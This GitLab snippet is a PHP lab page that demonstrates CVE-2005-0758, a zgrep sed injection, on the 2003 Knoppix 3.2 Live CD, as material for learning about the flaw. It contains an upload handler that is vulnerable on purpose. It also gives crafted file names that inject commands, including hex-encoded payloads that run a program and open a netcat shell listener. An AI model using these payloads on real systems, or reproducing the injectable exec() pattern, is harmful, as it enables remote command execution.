Skip to content
Snippets Groups Projects

a sample of CVE-2005-0758 (sed injection)

  • Clone with SSH
  • Clone with HTTPS
  • Embed
  • Share
    The snippet can be accessed without any authentication.
    Authored by cleemy desu wayo

    about sed injection

    try this sample on Knoppix 3.2

    Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed from the beginning when booting from Knoppix 3.2 (released at 2003) Live CD.

    you can run this sample on Knoppix 3.2 very easily without special settings.

    download Knoppix iso

    Edited
    cve-2005-0758.php 9.06 KiB
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212 
    <!doctype html>
<html lang="en-US">
<head>
<!--
============================================================
                a sample of CVE-2005-0758

      written by cleemy desu wayo / licensed under CC0
                 last update: 2023-08-08
============================================================

* try this sample on Knoppix 3.2:

  Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed
  from the beginning when booting from Knoppix 3.2 (released
  at 2003) Live CD.

  you can run this sample on Knoppix 3.2 very easily without
  special settings.


* download Knoppix iso:

  https://archive.org/details/knoppix-3.2-2003-07-26-en
  https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc


* how to run this sample:

  1. boot Knoppix Live CD ordinarily

  2. put this file (cve-2005-0758.php) on /var/www/ on server.
     "server" means Knoppix.

  3. change owner and chmod (on server)
      $ cd /var/www
      $ sudo chown www-data:www-data cve-2005-0758.php
      $ sudo chmod 600 cve-2005-0758.php

  4. start apache (on server)
      $ sudo apachectl start

  5. try connect from a client machine to
     http://<knoppix>/cve-2005-0758.php
     (when Knoppix is running on VirtualBox or some such,
      "client machine" means host OS)
-->
<title>a sample of CVE-2005-0758 (sed injection)</title>
<style>
  body { margin: 0 0 0 0; font-family: Arial;}
  h1, h2, h3, form, div, p { margin: 2.2rem 1.2rem 1.2rem 1.4rem; color: #333; }
  h1 { margin: 1rem 1.2rem 0.4rem 1.8rem; font-size: 2.1rem; }
  h2 { margin: 2.2rem 1.2rem 1.2rem 1.2rem; font-size: 1.6rem; }
  h3 { margin: 1.6rem 1.2rem 0.8rem 1.2rem; font-size: 1.1rem; }
  p { margin: 0.8rem 1.2rem 0.8rem 1.8rem; }
  form, div.fileinfo, div.description {
    margin: 2.2rem 2% 1.2rem 2%;
    padding: 0 0 2.2rem 0.6rem;
    border: 2px solid #ccc;
    border-radius: 8px;
  }
  ul, ol { margin: 0.8rem 1rem 0.9rem 1.2rem; }
  ul li { margin: 0.1rem 0 0.1rem 0; }
  ol li { margin: 0.8rem 0 0.9rem 0; }
  li a { font-size: 0.85rem; }
  span.info {
    margin-left: 0.8rem;
    color: #6666aa;
    font-size: 105%;
  }
  code {
    margin: 0.6rem 0 1.2rem 1.2rem;
    padding: 0.6rem 0 0.6rem 0.6rem;
    display: block;
    background-color: #333;
    color: #eee;
    max-width: 40rem;
    line-height: 110%;
  }
  a { text-decoration: none; }
  a:hover { text-decoration: underline; }
  footer {
    margin: 3rem 0 0 0;
    padding: 1.2rem 1rem 1.2rem 1rem;
    background-color: #eee;
  }
</style>
</head>
<body>
<h1>a sample of CVE-2005-0758</h1>
<p>written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-08</p>
<div class="fileinfo">
<h2>uploaded file infomartion:</h2>
<?
  if(empty($_FILES)) {
    print('<p>(no file uploaded)</p>');
  } else{
    $is_gz_str = 'no';

    $original_file_basename = basename($_FILES['file']['name']);
    $original_file_pathinfo = pathinfo($original_file_basename);
    if($original_file_pathinfo['extension'] === 'gz') {
      $is_gz_str = 'yes';

      // move to ./gz_stored/
      move_uploaded_file($_FILES['file']['tmp_name'], './gz_stored/'. $original_file_basename);

      // exec zgrep
      exec('zgrep CVE gz_stored/*.gz', $search_results);

      // save search results
      $fp = fopen('./gz_stat/latest-search-result.txt', 'w');
      foreach ($search_results as $line) {
        fwrite($fp, $line. "\n");
      }
      fclose($fp);
    }

    print('<p>file name: <span class="info">'. htmlspecialchars($_FILES['file']['name']). '</span></p>');
    print('<p>tmp file name: <span class="info">'. htmlspecialchars($_FILES['file']['tmp_name']). '</span></p>');
    print('<p>stored to gz_stored/ directory: <span class="info">'. htmlspecialchars($is_gz_str). '</span></p>');
  }
?>
</div>

<form enctype="multipart/form-data" method="post">
<h2>try upload a file:</h2>
<p><input type="file" name="file"></p>
<p><input type="submit"></p>
</form>

<div class="description">
<h2>about CVE-2005-0758</h2>
<p>this is an ancient vulnerability of zgrep. in case of GNU gzip, zgrep is a wrapper script.</p>
<ul>
  <li>NVD: <a href="https://nvd.nist.gov/vuln/detail/CVE-2005-0758">https://nvd.nist.gov/vuln/detail/CVE-2005-0758</a></li>
  <li>gentoo bug tracker: <a href="https://bugs.gentoo.org/90626">https://bugs.gentoo.org/90626</a></li>
  <li>before fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2</a></li>
  <li>after fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b</a></li>
</ul>

<h2>about sed injection</h2>
<ul>
  <li>CWE-74: <a href="https://cwe.mitre.org/data/definitions/74.html">https://cwe.mitre.org/data/definitions/74.html</a></li>
  <li>CWE-77: <a href="https://cwe.mitre.org/data/definitions/77.html">https://cwe.mitre.org/data/definitions/77.html</a></li>
  <li>CVE-2022-1509: <a href="https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/">https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/</a></li>
</ul>

<h2>try this sample on Knoppix 3.2</h2>

<p>Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed from the beginning when booting from Knoppix 3.2 (released at 2003) Live CD.</p>
<p>you can run this sample on Knoppix 3.2 very easily without special settings.</p>

<h3>download Knoppix iso</h3>
<ul>
  <li><a href="https://archive.org/details/knoppix-3.2-2003-07-26-en">https://archive.org/details/knoppix-3.2-2003-07-26-en</a></li>
  <li><a href="https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc">https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc</a></li>
</ul>

<h3>try RCE</h3>
<ol>
  <li>boot Knoppix Live CD ordinarily</li>
  <li>put this file (cve-2005-0758.php) on /var/www/ on server. "server" means Knoppix.</li>
  <li>change owner and chmod (on server)<code>$ cd /var/www<br>$ sudo chown www-data:www-data cve-2005-0758.php<br>$ sudo chmod 600 cve-2005-0758.php</code></li>
  <li>start apache (on server)<code>$ sudo apachectl start</code></li>
  <li>try connect from a client machine to http://&lt;knoppix&gt;/cve-2005-0758.php<br>(when Knoppix is running on VirtualBox or some such, "client machine" means host OS)</li>
  <li>create some directories in /var/www (on server)<code>$ cd /var/www<br>$ sudo mkdir gz_stat<br>$ sudo mkdir gz_stored</code></li>
  <li>change owner and chmod (on server)<code>$ sudo chown www-data:www-data gz_stat gz_stored<br>$ sudo chmod 707 gz_stat gz_stored<br></code></li>
  <li>create an ordinary gz file (on client)<code>$ echo CVE-2005-0758 &gt; hoge.txt<br>$ gzip hoge.txt<br>$ wc -c hoge.txt.gz<br>43 hoge.txt.gz</code></li>
  <li>access from the client machine to http://&lt;knoppix&gt;/cve-2005-0758.php<br>and upload hoge.txt.gz</li>
  <li>check if you have successfully uploaded (on server)<pre><code>$ cd /var/www/gz_stored<br>$ sudo wc -c hoge.txt.gz<br>     43 hoge.txt.gz<br>$ cat ../gz_stat/latest-search-result.txt<br>CVE-2005-0758</code></pre></li>

  <li>create a new gz file with a crafted filename (on client)<code>$ cp hoge.txt.gz '|;edate;#.gz'</code></li>
  <li>access to http://&lt;knoppix&gt;/cve-2005-0758.php again and upload a new file</li>
  <li>check if date command was executed and the search results are weird (on server)<code>$ cd /var/www/gz_stat<br>$ cat latest-search-result.txt<br>gz_stored/hoge.txt.gz:CVE-2005-0758<br>Tue Aug  8 14:54:20 CEST 2023<br>gz_stored/CVE-2005-0758</code></li>
  <li>delete a file with a crafted filename (on server)<br>(not necessary to do, but may be confusing if there are multiple files with crafted filenames on server)<br>and do NOT delete hoge.txt.gz<code>$ cd /var/www/gz_stored<br>$ sudo rm -rf *'#.gz'</code></li>
</ol>

<h2>crafted filenames examples</h2>

<h3>several commands</h3>
<ul>
  <li>you can exec several commands (this only taints the search results):<code>|;edate;whoami;id;#.gz</code></li>
</ul>

<h3>exec xgalaga on server-side</h3>
<ul>
  <li>this may not work:<code>|;exgalaga;#.gz</code></li>
  <li>this works fine (exec /usr/games/xgalaga):<code>|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.gz</code></li>
</ul>

<h3>get a reverse shell</h3>
<ul>
  <li>exec 'nc -lnvp 4444 -e /bin/sh':<code>|;eecho 6e63202d6c6e76702034343434202d65202f62696e2f73680a|xxd -r -p|sh;#.gz</code></li>
  <li>try connect to a reverse shell with netcat (from a client machine)<code>$ nc 192.168.1.3 4444<br>uname -a<br>Linux Knoppix 2.4.21-xfs #1 SMP Fre Jul 25 00:06:47 CEST 2003 i686 GNU/Linux<br>pwd<br>/var/www<br>whoami<br>www-data</code></li>
</ul>

</div>

<footer>
<p>written by cleemy desu wayo (
  <a href="https://github.com/cleemy-desu-wayo">GitHub</a> - 
  <a href="https://gitlab.com/cleemy-desu-wayo">GitLab</a> - 
  <a href="https://huntr.dev/users/cleemy-desu-wayo/">huntr.dev</a> - 
  <a href="https://note.com/cleemy/">note.com</a>)
</p>
<p>license: CC0</p>
<p>initial release: 2023-08-08</p>
<p>last update: 2023-08-08</p>
</footer>
</body>
</html>
    0% or .
    You are about to add 0 people to the discussion. Proceed with caution.
    Finish editing this message first!
    Please register or to comment